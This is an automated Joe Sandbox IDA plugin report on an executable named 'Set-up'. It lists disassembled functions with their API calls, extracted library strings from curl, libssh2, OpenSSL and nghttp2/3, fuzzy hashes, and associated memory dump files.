Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assert
String ID: !(stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES)$(stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES) || nghttp2_stream_in_dep_tree(stream)$dep_stream$nghttp2_session.c$stream->state == NGHTTP2_STREAM_IDLE
API String ID: 1222420520-184303863
Opcode ID: 1eb8ce7c60e2d2cbdf5fb8fafc2795c9a4e63ba2870811cb1f298e73aa3c3dd6
Instruction ID: 271cb434f8321081931ed7d5f11ebf7fe8b1d934760a9b09c4ab2dd0de34ee4b
Opcode Fuzzy Hash: 1eb8ce7c60e2d2cbdf5fb8fafc2795c9a4e63ba2870811cb1f298e73aa3c3dd6
Instruction Fuzzy Hash: 3DE11671B047859FEB718EA48C01BEB7BE5AF53314F084429E8498A2C2E779D945CF63

Function 0006E270 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 303stringCOMMON

Download Yara Rule

APIs

strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F,?,?,?,?,?,00000000,?,?,?,?,?,?,0006CC57), ref: 0006F028

Strings

NLST, xrefs: 0006F05E, 0006F07A
ftp.c, xrefs: 0006F08A, 0006F0BD, 0006F13C
TYPE %c, xrefs: 0006E323
STOR_PREQUOTE, xrefs: 0006F1F7
%s%s%s, xrefs: 0006F07B
LIST, xrefs: 0006F059, 0006F10A
SIZE %s, xrefs: 0006E406
[%s] -> [%s], xrefs: 0006E2E0, 0006E38E, 0006F116, 0006F203

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strrchr
String ID: %s%s%s$LIST$NLST$SIZE %s$STOR_PREQUOTE$TYPE %c$[%s] -> [%s]$ftp.c
API String ID: 3418686817-2910492138
Opcode ID: 8a8995416d3a5d7d28671d7773635bafbac327c82bdba5961565fd34a26e1a9e
Instruction ID: 0a59d0c3fcdbebf6565c43f1e30abd9ddcff74fbd1ad4e1a88a7a3f42eb917b7
Opcode Fuzzy Hash: 8a8995416d3a5d7d28671d7773635bafbac327c82bdba5961565fd34a26e1a9e
Instruction Fuzzy Hash: F7A147757043559BE7209A28EC45BB77BDBAB96308F18407DE8488B283E7B6DD41C7D0

Function 0010E420 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,00051887,?,?,00000000,?,00000000,00000007), ref: 0010E43D

Strings

Server does not support RENAME, xrefs: 0010E4B9
File already exists and SSH_FXP_RENAME_OVERWRITE not specified, xrefs: 0010E673
Unable to send FXP_RENAME command, xrefs: 0010E661
Operation Not Supported, xrefs: 0010E67A
SFTP rename packet too short, xrefs: 0010E5F9
SFTP Protocol Error, xrefs: 0010E63E
Unable to allocate memory for FXP_RENAME packet, xrefs: 0010E66A
Error waiting for FXP STATUS, xrefs: 0010E64F

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _time64
String ID: Error waiting for FXP STATUS$File already exists and SSH_FXP_RENAME_OVERWRITE not specified$Operation Not Supported$SFTP Protocol Error$SFTP rename packet too short$Server does not support RENAME$Unable to allocate memory for FXP_RENAME packet$Unable to send FXP_RENAME command
API String ID: 1670930206-3556387644
Opcode ID: 0a24ac26f9c4d3e033cdcd03c0d000ac79281989ae290bb10513ee4489f17ac4
Instruction ID: 03cb9201d0f400ba80ce0f1456f036e0eefe86caa66f0d9981e50bfa058efba3
Opcode Fuzzy Hash: 0a24ac26f9c4d3e033cdcd03c0d000ac79281989ae290bb10513ee4489f17ac4
Instruction Fuzzy Hash: 6571AFB1608304AFD7209F25EC85B6BBBE4AF51304F054D1DF9DA872E2E7B29914CB52

Function 00262370 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 86encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 0026238F
CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 002623C4
GetLastError.KERNEL32 ref: 00262433

Part of subcall function 00262240: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,0025F763,?,?,?,?,?), ref: 00262251
Part of subcall function 00262240: WideCharToMultiByte.KERNEL32 ref: 00262284
Part of subcall function 00262240: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 002622BD

Strings

capi_cert_get_fname, xrefs: 00262379
Error code= 0x, xrefs: 0026244F
engines/e_capi.c, xrefs: 002623A4, 00262426, 00262466
%lX, xrefs: 0026243E
ERR_CAPI_error, xrefs: 002623F9
engines/e_capi_err.c, xrefs: 00262400

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: ByteCertCertificateCharContextMultiPropertyWide$ErrorLastwcslen
String ID: %lX$ERR_CAPI_error$Error code= 0x$capi_cert_get_fname$engines/e_capi.c$engines/e_capi_err.c
API String ID: 3049598375-4146664032
Opcode ID: a7b4992de0927a1d6476a2847345a48a6671f68fab0b47b787812f6a43ff7917
Instruction ID: 5cf47544755004ec3cd5f26a97a810790c2644434391c8ba75f2a87dd1e308f4
Opcode Fuzzy Hash: a7b4992de0927a1d6476a2847345a48a6671f68fab0b47b787812f6a43ff7917
Instruction Fuzzy Hash: DE21E7A17507017BF3203765BC47F3B362ADB51B56F010034FE08A93D3EB968A2886E2

Function 00050762 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 377stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00050794

Part of subcall function 0010F340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,000500B0,?,?,00000000,00000000,?), ref: 0010F35D

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0005356E

Strings

Upload failed: %s (%lu/%d), xrefs: 00054719
Bad file size (%lld), xrefs: 00054D42
Unknown error in libssh2, xrefs: 0005386C, 00053874
Could not seek stream, xrefs: 00054D26
ssh error, xrefs: 0005470D, 00054718
Failed to read data, xrefs: 00054CD7
Creating the dir/file failed: %s, xrefs: 00053875

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strlen$_time64
String ID: Bad file size (%lld)$Could not seek stream$Creating the dir/file failed: %s$Failed to read data$Unknown error in libssh2$Upload failed: %s (%lu/%d)$ssh error
API String ID: 2413861649-3110757985
Opcode ID: 83171b1694c7406e7c3d2601e47f559d9ff57d1ef316f5d9c968f5c184b5beb9
Instruction ID: 25cfe97433ec358047de00043e450f7a1f16449b4f4f3ddc2a7d0f2a53e1aee1
Opcode Fuzzy Hash: 83171b1694c7406e7c3d2601e47f559d9ff57d1ef316f5d9c968f5c184b5beb9
Instruction Fuzzy Hash: 3CE1CEB5A047019BD715DF28C885BABB7E5BB88304F144638FC598B352DB71AE48CB92

Function 0018A1B0 Relevance: 15.2, APIs: 3, Strings: 7, Instructions: 174stringCOMMON

Download Yara Rule

APIs

Part of subcall function 001FB4B0: GetEnvironmentVariableW.KERNEL32(OPENSSL_WIN32_UTF8,00000000,00000000,?,?,00000000,00000000,00000000,?,00207667,OPENSSL_MODULES), ref: 001FB4CA
Part of subcall function 001FB4B0: GetACP.KERNEL32(?,?,00000000,00000000,00000000,?,00207667,OPENSSL_MODULES), ref: 001FB4D4
Part of subcall function 001FB4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,00207667,000000FF,00000000,00000000,?,?,00000000,00000000,00000000,?,00207667,OPENSSL_MODULES), ref: 001FB53B
Part of subcall function 001FB4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,00207667,000000FF,-00000008,00000000,?,?,?,00000000,00000000,00000000,?,00207667,OPENSSL_MODULES), ref: 001FB5A1
Part of subcall function 001FB4B0: GetEnvironmentVariableW.KERNEL32(-00000008,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00207667,OPENSSL_MODULES), ref: 001FB5B4
Part of subcall function 001FB4B0: GetEnvironmentVariableW.KERNEL32(?,-00000008,00000000,?,?,?,?,00000000,00000000,00000000,?,00207667,OPENSSL_MODULES), ref: 001FB648
Part of subcall function 001FB4B0: WideCharToMultiByte.KERNEL32 ref: 001FB67F

Part of subcall function 001FB4B0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(00207667,?,?,00000000,00000000,00000000,?,00207667,OPENSSL_MODULES), ref: 001FB504

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0018A1F0
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0018A20B
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000000,00000000), ref: 0018A25D

Strings

_%s.sqlog, xrefs: 0018A2F0
QLOGDIR, xrefs: 0018A1BB
client, xrefs: 0018A2E2
OSSL_QFILTER, xrefs: 0018A1CA
server, xrefs: 0018A2E7, 0018A2EF
%02x, xrefs: 0018A29F
ssl/quic/qlog.c, xrefs: 0018A23E, 0018A375, 0018A38C

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: ByteCharEnvironmentMultiVariableWide$strlen$getenvmemcpy
String ID: %02x$OSSL_QFILTER$QLOGDIR$_%s.sqlog$client$server$ssl/quic/qlog.c
API String ID: 2744062652-2540125403
Opcode ID: 2b59895640769a8f42ed169ed7665a7860f6f2a65e53ca333292fb29dce136d3
Instruction ID: 3ba57e4ecf5e8f18794d0c3911c5023c9afe998cd97bcf24178f05fa82d33bbe
Opcode Fuzzy Hash: 2b59895640769a8f42ed169ed7665a7860f6f2a65e53ca333292fb29dce136d3
Instruction Fuzzy Hash: 155108A5E043586FFB1076249C42B3B7BD96F91704F484439FE8987243F769EE148B92

Function 000427E0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 299stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0004284C

Strings

url.c, xrefs: 00042863, 000428B0, 00042CF9, 00042DDE
%s%s%s, xrefs: 00042834
Please URL encode %% as %%25, see RFC 6874., xrefs: 000429E3
Alt-svc connecting from [%s]%s:%d to [%s]%s:%d, xrefs: 00042DA3
No valid port number in connect to host string (%s), xrefs: 00042C4B

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strlen
String ID: %s%s%s$Alt-svc connecting from [%s]%s:%d to [%s]%s:%d$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.$url.c
API String ID: 39653677-4104037097
Opcode ID: 681d4cd223169d5122a2774527031d25b6759ea45a91140cdc0fbf103d5bcee8
Instruction ID: daca9ce57afb74c7211c5b25fb45e13170c7c0b1a4b38a1baf0245e6598b6473
Opcode Fuzzy Hash: 681d4cd223169d5122a2774527031d25b6759ea45a91140cdc0fbf103d5bcee8
Instruction Fuzzy Hash: 42A134B0B043406BDB648E18D845B7A7BD6AF86354F88447CFC898B293E7719C61C796

Function 0005A260 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 160networkCOMMON

Download Yara Rule

APIs

getpeername.WS2_32(?,?,00000080), ref: 0005A376
WSAGetLastError.WS2_32 ref: 0005A380

Part of subcall function 000278B0: closesocket.WS2_32(?), ref: 000278BB

Part of subcall function 0005EF30: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000001,?,?), ref: 0005EF6F

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0005A3D2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0005A3D6

Strings

getpeername() failed with errno %d: %s, xrefs: 0005A3A0
cf-socket.c, xrefs: 0005A2E9
accepted_set(sock=%d, remote=%s port=%d), xrefs: 0005A488
ssrem inet_ntop() failed with errno %d: %s, xrefs: 0005A3F4

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _errno$ErrorLastclosesocketgetpeername
String ID: accepted_set(sock=%d, remote=%s port=%d)$cf-socket.c$getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
API String ID: 1501154218-2965463112
Opcode ID: 233b84d37aadd2a8a51ae1890c625c29c5687812682d09b1f93873d6e3a37b3a
Instruction ID: 3c2248b1e061e29f35656e17382dab75a5c4e2be05f5e6cff49337dfad069930
Opcode Fuzzy Hash: 233b84d37aadd2a8a51ae1890c625c29c5687812682d09b1f93873d6e3a37b3a
Instruction Fuzzy Hash: 92510931904740AFD7619F28DC46BEB77F8AF82315F044518FD5C47252EB32A989CB92

Function 000CA5A0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 124COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 000CA5FC
memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 000CA698
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 000CA6BF
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i + 1 < blk->n,nghttp3_ksl.c,0000019B), ref: 000CA6EB
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK,nghttp3_ksl.c,000001A2), ref: 000CA700

Strings

lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK, xrefs: 000CA6FB
i + 1 < blk->n, xrefs: 000CA6E6
nghttp3_ksl.c, xrefs: 000CA6E1, 000CA6F6

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assertmemcpy$memmove
String ID: i + 1 < blk->n$lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK$nghttp3_ksl.c
API String ID: 3463011695-2629231663
Opcode ID: 93fc9695a8fe31fc0d90480b564af18f7f5e64133be173e5fd2202ada9e0cb13
Instruction ID: bd43976383bf4dc2c71241b0a0301dfb292d5d0af4566774085e6627749f3921
Opcode Fuzzy Hash: 93fc9695a8fe31fc0d90480b564af18f7f5e64133be173e5fd2202ada9e0cb13
Instruction Fuzzy Hash: 9C415F757043049FC708DF18D886DAAB7E6FB99318F08C96DE8898B352E670ED11CB55

Function 00262480 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 00262491
CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 002624C6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0025F5B4), ref: 00262529

Strings

Error code= 0x, xrefs: 00262545
engines/e_capi.c, xrefs: 002624A6, 0026251C, 00262559
%lX, xrefs: 00262534
ERR_CAPI_error, xrefs: 002624EF
engines/e_capi_err.c, xrefs: 002624F6

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: CertCertificateContextProperty$ErrorLast
String ID: %lX$ERR_CAPI_error$Error code= 0x$engines/e_capi.c$engines/e_capi_err.c
API String ID: 2217977984-837018288
Opcode ID: c4ca52bfe98e18d98aaa1d060232cd9eb099adcb4da5a53782ec17965c29c996
Instruction ID: c9db70ff51abb6bd928ef988694c1630b6d58d245a9b27e99fa36e6ce18de204
Opcode Fuzzy Hash: c4ca52bfe98e18d98aaa1d060232cd9eb099adcb4da5a53782ec17965c29c996
Instruction Fuzzy Hash: 3811C8B1B9071477F2203771BC47F3B362ADB14B59F451020F908A92D3FA928A2486E2

Function 000AA340 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((!session->server && session->pending_no_rfc7540_priorities != 1) || (session->server && !session_no_rfc7540_pri_no_fallback(session)),nghttp2_session.c,0000034E), ref: 000AA377
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri_spec->stream_id != stream->stream_id,nghttp2_session.c,0000034F), ref: 000AA507
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(dep_stream,nghttp2_session.c,00000377), ref: 000AA51C

Strings

dep_stream, xrefs: 000AA517
(!session->server && session->pending_no_rfc7540_priorities != 1) || (session->server && !session_no_rfc7540_pri_no_fallback(session)), xrefs: 000AA372
nghttp2_session.c, xrefs: 000AA36D, 000AA4FD, 000AA512
pri_spec->stream_id != stream->stream_id, xrefs: 000AA502

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
